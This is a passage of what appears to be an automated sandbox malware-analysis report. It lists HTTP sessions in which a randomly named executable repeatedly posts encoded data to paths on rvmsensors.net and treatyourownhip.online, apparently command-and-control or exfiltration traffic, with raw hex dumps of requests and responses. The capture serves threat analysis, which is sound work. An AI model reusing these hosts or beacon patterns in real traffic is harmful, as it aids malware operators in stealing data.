                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.rvmsensors.net
                                                                                                                                                                          Referer: http://www.rvmsensors.net/hcwd/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 6f 45 39 4e 39 68 7a 76 55 47 4f 56 59 78 39 2f 61 4e 47 4a 72 2b 33 65 79 4b 62 67 44 70 42 36 5a 78 44 34 79 75 66 6f 31 55 52 46 79 71 59 63 51 7a 70 43 4b 58 57 74 73 59 79 36 74 47 34 47 46 47 76 48 34 7a 39 49 65 37 78 72 73 4f 63 43 48 68 4d 2f 37 51 72 77 73 62 47 62 57 67 54 58 6e 31 32 68 4f 35 5a 7a 2f 43 52 6e 4b 44 6b 4d 6b 76 57 6b 6d 74 6a 4c 76 76 68 74 66 54 78 32 38 39 4b 78 71 2f 55 6c 56 4f 6b 62 4d 72 4d 50 63 50 75 4e 64 36 34 72 31 73 4f 4c 2b 4c 45 31 4d 52 35 36 34 77 76 62 50 35 65 66 50 56 56 78 4a 37 56 5a 31 57 63 78 55 45 44 4f 51 6e 7a 66 32 6a 34 4b 6c 68 52 54 66 58 4a 35 2f 75 2b 78 63 62 4b 4c 62 55 6e 55 33 67 68
                                                                                                                                                                          Data Ascii: 9X=9oE9N9hzvUGOVYx9/aNGJr+3eyKbgDpB6ZxD4yufo1URFyqYcQzpCKXWtsYy6tG4GFGvH4z9Ie7xrsOcCHhM/7QrwsbGbWgTXn12hO5Zz/CRnKDkMkvWkmtjLvvhtfTx289Kxq/UlVOkbMrMPcPuNd64r1sOL+LE1MR564wvbP5efPVVxJ7VZ1WcxUEDOQnzf2j4KlhRTfXJ5/u+xcbKLbUnU3gh
                                                                                                                                                                          Oct 23, 2024 17:15:56.391896009 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:56 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: br
                                                                                                                                                                          Data Raw: 64 61 34 0d 0a 15 99 4e 00 c4 ff d7 e9 57 ff 9b ea 2e 13 6c ef 01 2c 04 18 7f 3c 78 43 8c 02 1e 46 df 20 31 48 e0 34 53 94 d3 14 9b 52 37 d5 86 e4 f9 57 6b fd 9b b0 50 61 e3 53 9e d9 58 12 26 d5 30 53 75 fb e0 03 b3 0a f4 74 f7 ec d1 de 3d a0 0b 11 09 93 8a 8e d2 40 32 36 2e ca 6e f8 e5 31 54 97 b6 7b 3f f1 00 22 20 46 93 cd 63 04 2c 59 5f 50 0d 88 f4 c8 cc 21 35 c0 61 2b 00 c4 0d 07 47 fb fa fd f9 ab 42 0a 94 ba 3d ff a4 5c d4 da 58 a9 36 10 80 e3 2e 07 a4 29 3e a0 3c ab 01 df 6c 0f 38 46 c9 e1 98 90 61 68 8a 77 c9 9c c1 56 de d2 d9 4c e5 17 18 af c5 41 8d 0e 69 d1 96 a1 b1 c8 45 3d 58 d3 0e 2d b3 ec cb 02 9f b9 dc 24 56 df 8f 83 79 1e 38 e0 e7 08 61 bd 92 6c 45 93 79 6d b6 d4 10 01 ef 2f 53 1a 3a 8b 78 56 48 07 89 d3 e7 1f b4 b6 b6 f3 e8 ee 20 c7 cc 29 27 8a f6 4a 2f 3d 97 3d 57 6e 08 11 28 fd ce e8 e6 01 a9 f6 8c a2 54 fe 8e ea eb 68 98 67 f6 19 8d 54 5b f4 d4 64 0e c7 0d 3b 71 1b 73 ee dc 25 d5 c6 eb b8 5a 39 41 80 c7 ed d4 c6 61 11 03 c3 c0 c1 11 d2 cf 7e 5e 36 b2 c3 ab c3 56 b8 a8 7e 3f b4 49 [TRUNCATED]
                                                                                                                                                                          Data Ascii: da4NW.l,<xCF 1H4SR7WkPaSX&0Sut=@26.n1T{?" Fc,Y_P!5a+GB=\X6.)><l8FahwVLAiE=X-$Vy8alEym/S:xVH )'J/==Wn(ThgT[d;qs%Z9Aa~^6V~?I'X I{O[iRZRLw2b2}FVbSS._IOf`N,jaUuMW56";Jq$1pJav{Z7%apSUO%:|7gS?77L7K=C'yLK{aJA&*JuyE:tQG.EHL86Y"|c`b)c<bh5dt|#!l!K7XzL60c*{k7)'oo^G/VtFI!{!RO`+<Uh;<U:Ut5S`$Oc1H(cYfMiHGWOWXikQ_!F`wuj#_3Rv*5*Qt`}!*Jx6O-@eiJi\Ux&hw"+LD r ]|\ 5Kw,#T<S/H|i`*2#{GWgM!gc&eacFAnpEg"<czo" [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:56.391921997 CEST1236INData Raw: 38 f6 9c 29 6e 54 15 3e 81 0e 0f e8 a9 5e e2 0d d6 1e b8 b4 16 78 fb 85 fc 46 2a a8 00 66 8b 7f c8 38 09 af 2d ac d1 8c 18 92 b2 76 c0 8f cd c6 a8 57 7d 81 80 19 9c 1f 15 f5 c3 40 2b 55 e1 3c 82 b1 b1 7e 89 66 ef 60 d5 10 45 41 a1 6f 95 d5 c1 b3
                                                                                                                                                                          Data Ascii: 8)nT>^xF*f8-vW}@+U<~f`EAoSf;w#@4;[!VpOi14%FUD1bYRXh;BleiH)&SS,fCU^D/v([d[bDHt'.B"(_c!@E/e
                                                                                                                                                                          Oct 23, 2024 17:15:56.391941071 CEST424INData Raw: 00 37 ba fa ca 93 f7 32 eb 3c 88 d4 fd 15 e0 57 34 fa ff f2 3b 07 d0 ea 26 e5 32 1f b8 91 95 8d 85 2d b9 15 37 6d 7e 35 64 0f 8f 26 f3 c3 cf 7c cf bb 07 2b c2 3c a0 de 8d ef db 11 ba 1c bb 06 5d 4c 62 5f 63 dd 71 15 77 b5 5a ee 2f 17 58 96 de 99
                                                                                                                                                                          Data Ascii: 72<W4;&2-7m~5d&|+<]Lb_cqwZ/Xu#!WkYcF7(IZ|Qo=ayqf`x+Tr[q-+2RYmS4:u`Ql3y:X.`JM_`?'8JJ>z
                                                                                                                                                                          Oct 23, 2024 17:15:56.391951084 CEST815INData Raw: ce 5f 8d ba f4 eb 48 6f c0 24 a9 29 51 55 66 d5 ef 4d 35 5f bf b1 2f cb 97 10 8c 84 d2 e3 f9 77 de 7f e4 80 51 3b dc 47 68 50 b2 f3 8b f8 37 c0 f9 43 c1 02 e3 95 03 90 bd 39 31 68 90 f1 8b cc 9c 0d d9 5b 3c 82 99 b3 28 60 10 fb d0 7c a4 71 e1 0d
                                                                                                                                                                          Data Ascii: _Ho$)QUfM5_/wQ;GhP7C91h[<(`|qkIr^PHVzwY[q)YB<#!hL(wD.C']9<r^Sqqq9oQJd1b-3suojgJVZY&)$m=E7


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          51192.168.2.55002837.9.175.196802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:58.043466091 CEST1812OUTPOST /hcwd/ HTTP/1.1
                                                                                                                                                                          Host: www.rvmsensors.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.rvmsensors.net
                                                                                                                                                                          Referer: http://www.rvmsensors.net/hcwd/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 6f 45 39 4e 39 68 7a 76 55 47 4f 56 59 78 39 2f 61 4e 47 4a 72 2b 33 65 79 4b 62 67 44 70 42 36 5a 78 44 34 79 75 66 6f 31 63 52 47 45 57 59 4f 68 7a 70 46 4b 58 57 79 63 59 33 36 74 47 70 47 46 75 72 48 34 2f 4c 49 64 50 78 6f 4e 75 63 56 6a 31 4d 78 37 51 72 37 4d 62 44 56 32 67 38 58 6d 5a 79 68 50 4a 5a 7a 2f 43 52 6e 4c 7a 6b 46 56 76 57 69 6d 74 67 43 50 76 45 38 50 54 56 32 38 6b 31 78 71 4b 68 6b 68 43 6b 62 73 37 4d 66 35 62 75 43 64 36 41 2b 31 73 67 4c 2b 50 68 31 4d 39 44 36 34 31 36 62 49 56 65 50 2f 59 65 6b 4c 48 55 62 7a 32 48 35 57 31 6d 57 6d 2f 4c 65 6d 66 50 57 6e 4a 6e 54 4e 62 4a 2b 76 57 71 6b 76 57 35 5a 2f 55 67 52 41 30 67 52 71 6f 78 2b 4a 72 47 70 48 4b 74 4d 58 53 63 52 75 66 55 45 4b 69 58 4e 51 44 48 6e 53 77 46 68 2b 65 33 50 4c 30 72 34 61 53 62 56 71 57 52 5a 6e 30 68 75 49 45 59 42 4e 54 4f 6e 67 6a 69 73 30 7a 56 42 47 64 72 71 54 50 57 58 56 61 34 38 53 59 37 33 4d 65 44 4a 71 36 75 73 35 41 66 46 79 6d 6a 68 7a 70 49 4d 6e 71 71 44 54 54 56 53 45 38 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=9oE9N9hzvUGOVYx9/aNGJr+3eyKbgDpB6ZxD4yufo1cRGEWYOhzpFKXWycY36tGpGFurH4/LIdPxoNucVj1Mx7Qr7MbDV2g8XmZyhPJZz/CRnLzkFVvWimtgCPvE8PTV28k1xqKhkhCkbs7Mf5buCd6A+1sgL+Ph1M9D6416bIVeP/YekLHUbz2H5W1mWm/LemfPWnJnTNbJ+vWqkvW5Z/UgRA0gRqox+JrGpHKtMXScRufUEKiXNQDHnSwFh+e3PL0r4aSbVqWRZn0huIEYBNTOngjis0zVBGdrqTPWXVa48SY73MeDJq6us5AfFymjhzpIMnqqDTTVSE8DfuQ9MYo+WJLLMSvgP/OaX99IX5KW/nK0i6Q5bEBjJizUZqGGFx/yBstb0mN5jaWULz9ohJY0JkzJi/8pTFnG5bgH4G2hsaVEbP4X7Ew1z1vBsuatOhgon9eypvbajE2ebkJpF09Wke2v9CoV3+mQh7rQP3Pys992gxk0nqa1kCq19egv0B0Gt0QzTGYuMqO/kFqOGzBhgIed17ZT/20a0c4+hToU4clwtCZdD6UF6DtQIjM7Xgd+q6hTyVPzxfoXP6exGz5aXsyhp4Wo4xJNJQF5/+fA6wsPD8KAe5rUqUI6bUfUkutQTvej5BgeiS3a7i6t2r424BeloLPc3fEu3rAfOylXymypUofGjXaGfELG5VixPRqkMsBz/zfpm4zM3iU7PwO6RLr9VO6QBdrzP3VQXxjfXPAO0e3VuamuMyLZZaIY51I2wWnR9WulIHHBLmprgdqKr3ojit+HrP9dL5LlEiQyIFWSrLDZNy30Py+yUR6IUPpTcv1pi5717xpfp05axi0NB1sT5ksl51U32bBTBolA0WwlOXdc9YcB64RFTEocNSqGlVoqnooX28Y9NPyRiKWKzlmuyLz0Hsb1fD4zNs//6e764TFpB1D1ikNTzBrySXOcXu2ebH9ptUmC9GleRJff/EIGAffXpvKzG6whcAueUy6WG [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:58.936841011 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:58 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: br
                                                                                                                                                                          Data Raw: 64 61 65 0d 0a 15 a6 4e 00 c4 ff d7 e9 57 ff 9b ea 2e 13 6c ef 01 2c 04 18 7f 3c 78 43 8c 02 1e 46 df 20 31 48 e0 34 53 94 d3 14 9b 52 37 d5 86 e4 f9 57 6b fd fb c3 42 85 8d 4f 79 66 63 49 98 54 c3 4c d5 ed dd 7f 1f 98 55 a0 a7 a7 67 8f f6 f6 01 6d 08 51 a6 a2 a3 34 90 8c 8d 8b b2 1b be 3c 86 ea d2 b5 7b 37 f1 00 22 20 46 93 cd 62 04 2c 5a 5f 50 0d 88 74 ff cc 21 35 c0 61 33 00 c4 75 07 47 fb fa fd f9 ab 42 0a 94 ba 3d ff a4 5c d4 da 58 a9 36 10 80 e3 56 07 a4 29 3e a0 3c ab 8a 6f b6 07 1c a3 e4 70 4c 48 0b 9a e2 0d 32 67 b0 95 b7 74 36 53 f9 39 c6 eb 70 50 a3 43 5a 74 65 68 2c 70 51 0f 56 b5 43 cb 2c 7b b2 c0 67 2e 37 89 d5 77 e1 60 9e 07 0e f8 39 44 58 af 24 5b d1 64 5e 1b 2d 35 44 c0 bb ca 94 86 2e 46 bc 58 48 03 89 c3 e7 1f b4 b6 b6 f3 e8 ee 20 c7 cc 29 27 8a f6 7c 2f 3d 97 3d 57 6e 08 11 28 fd de e8 e6 01 a9 f6 b8 a2 54 fe 8e ea 6b 68 98 67 f6 21 8d 54 5b f4 d4 64 0e c7 b5 9c b8 8d 39 77 ee 90 6a e3 75 5c ad 9c 20 c0 43 76 6a e3 b0 48 04 43 c7 c1 1e d2 2f 7d 53 e8 46 e3 35 a1 0a a9 a4 8b 6e 55 [TRUNCATED]
                                                                                                                                                                          Data Ascii: daeNW.l,<xCF 1H4SR7WkBOyfcITLUgmQ4<{7" Fb,Z_Pt!5a3uGB=\X6V)><opLH2gt6S9pPCZteh,pQVC,{g.7w`9DX$[d^-5D.FXH )'|/==Wn(Tkhg!T[d9wju\ CvjHC/}SF5nU]p '}x/\NkesH1axfEYdBf;Our3OmOj||7$Ur?>l:6@l2s3zNW7]8k8*misH`ic,/,D7;/nJZ.S>Juo~>,3nn=3nz<#N)L&To:pQsu\z$?J?&6X"|c`|nEl14n?:Ti[]>L@z-qLWzoZ&::a%3%06%%]]}U)'0Z~\nVnO4ihcg|R0}Ny$OW,j`cxA4C|khip4^z(V/*#}:5VU`o4RWe+U*Qt`}CM$%2JD?=)qU\2FA&(jt-o7/f*\mIu$LAcN+Q!fc&y!1*}\Dy [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:58.936898947 CEST212INData Raw: 79 d2 f3 b9 1e b6 60 9c f1 c8 ec 63 4f 9a e2 46 55 e1 e3 e8 70 b7 9e ea 25 de 60 ed 81 7f 6b 9e b7 5f c8 89 a4 82 0a 60 76 f8 c7 8f 93 f0 c6 85 35 9a 11 4d 29 6b 2b 7e 6c 36 7a bd 6a 0b 04 cc 60 fc 28 a8 1f 2a ad 54 85 73 3f c6 c6 fa c5 9b bd d5
                                                                                                                                                                          Data Ascii: y`cOFUp%`k_`v5M)k+~l6zj`(*Ts?!B,g?Rof;#Hov7 B*z-nY}/b$s%eT(eI%bxkFq>Z $_$lBPy8e<B`6^?b
                                                                                                                                                                          Oct 23, 2024 17:15:58.937541962 CEST1236INData Raw: b2 e5 1e b7 85 29 a6 bd 49 4e 44 a1 81 44 77 fc 22 64 9d 24 82 f2 bd 6f 22 19 81 bb 24 dc a5 32 59 1d a8 88 eb e1 45 b8 8c 42 29 c4 b0 b7 e0 84 48 11 88 ed 9a 78 bd 5b 41 b2 02 58 11 8c 61 1b 71 c2 84 b5 1e 53 05 60 9a 98 8e 53 a3 5f 77 bd c9 49
                                                                                                                                                                          Data Ascii: )INDDw"d$o"$2YEB)Hx[AXaqS`S_wIx^K1RjF8OwXo+Q8_"wTwB{&/WmJ*V-EgQB->!=@aMx"p=`oNVO,Ie^GT@%nem(6B9q
                                                                                                                                                                          Oct 23, 2024 17:15:58.937555075 CEST1037INData Raw: bc cc a6 d1 a3 d8 66 f2 fa 75 b0 7e 5d c0 d2 95 9a 88 7e 81 01 a5 f6 40 34 b8 f0 bd 48 38 0a 2b c5 a3 bf 13 fc b1 2a f9 e8 01 94 24 5c 11 7d a6 5a 07 c8 7d f5 6e fd ec f9 e1 a8 4b 3d ba e8 7a 7a f4 40 c3 08 28 3a 8e 75 fe bd 77 1c ae 08 d7 7f 4b
                                                                                                                                                                          Data Ascii: fu~]~@4H8+*$\}Z}nK=zz@(:uwKQtnD=?CRkOma,tQ>diJn~lQKvpu(P1C(UAS>yw;lR,o9`<&X-m!=YOCuIPSLj


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          52192.168.2.55002937.9.175.196802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:16:00.583548069 CEST522OUTGET /hcwd/?9X=wqsdOIwQnV+rc5xe3M17LsCEHDXbvUAt7b9v0h6Q5REfDRPnfgrmUJ/SsNAT27O4J2mBDqLSNO3xx/PwERc00aw49NjnZ10GfH1ek+9b7dOW1JjLH3u3vCxZXNj5tdujpA==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.rvmsensors.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:16:01.479159117 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:16:01 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 33 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 c3 a1 63 69 61 20 64 6f 6d c3 a9 6e 2c 20 68 6f 73 74 69 6e 67 20 61 20 73 65 72 76 65 72 79 20 3a 3a 20 57 65 62 73 75 70 70 6f 72 74 2e 73 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 3fc0<!DOCTYPE html><html lang="en"><head> <title>Registrcia domn, hosting a servery :: Websupport.sk</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0" /> <meta name="format-detection" content="telephone=no"> <meta name="keywords" content=""> <meta name="description" content=""> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <base href="https://cdn.websupport.eu/"> <link rel="icon" href="/parking-pages/favicon.png" type="image/x-icon"> <meta name="author" content="Nicole Smith, nicole.smith.4991@gmail.com"> <style> @font-face { font-family: 'WebsupportSans-Normal'; src: url('https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eot'); src: url('https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eot?#iefix') format('embedded-opentype'), url('https://cdn.websupport.sk/fonts/WebsupportSans-Normal.woff2') format('woff2'), url('https://cdn.we [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:16:01.479203939 CEST1236INData Raw: 73 2f 57 65 62 73 75 70 70 6f 72 74 53 61 6e 73 2d 4e 6f 72 6d 61 6c 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 77 65 62 73 75 70 70 6f 72 74 2e 73 6b 2f 66 6f 6e 74
                                                                                                                                                                          Data Ascii: s/WebsupportSans-Normal.woff') format('woff'), url('https://cdn.websupport.sk/fonts/WebsupportSans-Normal.ttf') format('truetype'); font-weight: normal; font-style: normal; font-display: swap; } @font-face
                                                                                                                                                                          Oct 23, 2024 17:16:01.479216099 CEST424INData Raw: 6e 2c 20 2e 75 70 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70
                                                                                                                                                                          Data Ascii: n, .up a { cursor: pointer } * { margin: 0; padding: 0; box-sizing: border-box; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: tran
                                                                                                                                                                          Oct 23, 2024 17:16:01.479250908 CEST1236INData Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 75 70 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 2d 77 65
                                                                                                                                                                          Data Ascii: ng: 0; border: 0; outline: 0 } .up html { -webkit-text-size-adjust: none } .up button, .up input, .up select, .up textarea { font-size: 100%; margin: 0; vertical-align:
                                                                                                                                                                          Oct 23, 2024 17:16:01.479264021 CEST1236INData Raw: 72 65 61 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 37 61 31 61 62 3b 0a 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: rea::-moz-placeholder { color: #97a1ab; opacity: 1 } .up textarea:-ms-input-placeholder { color: #97a1ab; opacity: 1 } .up button::-moz-focus-inner, .up input[type=submit]::-moz-focus-i
                                                                                                                                                                          Oct 23, 2024 17:16:01.479276896 CEST424INData Raw: 64 74 68 3a 20 31 30 30 25 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 75 70 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31
                                                                                                                                                                          Data Ascii: dth: 100% } .up .logo img { width: 100%; max-width: 123px } .up .imgblk { text-align: center } .mobile { display: none; } .up .imgblk .imgbox { margin-
                                                                                                                                                                          Oct 23, 2024 17:16:01.479296923 CEST1236INData Raw: 2e 75 70 20 2e 69 6d 67 62 6c 6b 20 2e 63 6f 6e 74 65 6e 74 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 63 33 38 34 33 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: .up .imgblk .content h1 { color: #2c3843; font-size: 24px; text-align: center; line-height: 1.17; margin-bottom: 16px; font-weight: 700; font-family: Arial, sans-serif; letter-spa
                                                                                                                                                                          Oct 23, 2024 17:16:01.479386091 CEST1236INData Raw: 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 34 70 78 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 70 61 67 65 5f 34 2e 75 70 20 2e 69 6d 67 62 6c 6b 20 2e 69 6d 67 62 6f 78 20 69 6d 67 20
                                                                                                                                                                          Data Ascii: ign: left; margin: 0 0 24px } .page_4.up .imgblk .imgbox img { max-width: 530px } .up .content .bottom_blk { display: flex; justify-content: space-between; align-items: center;
                                                                                                                                                                          Oct 23, 2024 17:16:01.479398012 CEST1236INData Raw: 2e 75 70 20 2e 69 6d 67 62 6c 6b 20 2e 69 6d 67 62 6f 78 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: .up .imgblk .imgbox { width: 50%; text-align: center } .page_4.up .logo { padding: 0; text-align: left; margin: -22px 0 72px } .page_4.up .imgblk .content h1 { font-fami
                                                                                                                                                                          Oct 23, 2024 17:16:01.479409933 CEST1236INData Raw: 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74
                                                                                                                                                                          Data Ascii: sans-serif; font-weight: 700; font-size: 18px; line-height: 1.34 } .page_4.up form a.search_btn { width: 71px; line-height: 54px; padding: 0; border: 0; -webkit-borde
                                                                                                                                                                          Oct 23, 2024 17:16:01.484754086 CEST1236INData Raw: 64 74 68 3a 20 31 32 30 30 70 78 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 5f 34 2e 75 70 20 2e 69 6d 67 62 6c 6b 20 2e 63 6f 6e 74 65 6e 74 2c 20 2e 70 61 67 65 5f 34 2e 75 70 20 2e 69 6d 67 62 6c 6b 20 2e 69 6d 67 62 6f 78 20 7b 0a
                                                                                                                                                                          Data Ascii: dth: 1200px) { .page_4.up .imgblk .content, .page_4.up .imgblk .imgbox { width: 50% } .page_4.up .imgblk .content h1 { font-size: 40px } .page_4.up .imgblk .content h2 {


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          53192.168.2.55003081.169.145.95802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:16:06.858081102 CEST799OUTPOST /k7fo/ HTTP/1.1
                                                                                                                                                                          Host: www.treatyourownhip.online
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.treatyourownhip.online
                                                                                                                                                                          Referer: http://www.treatyourownhip.online/k7fo/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
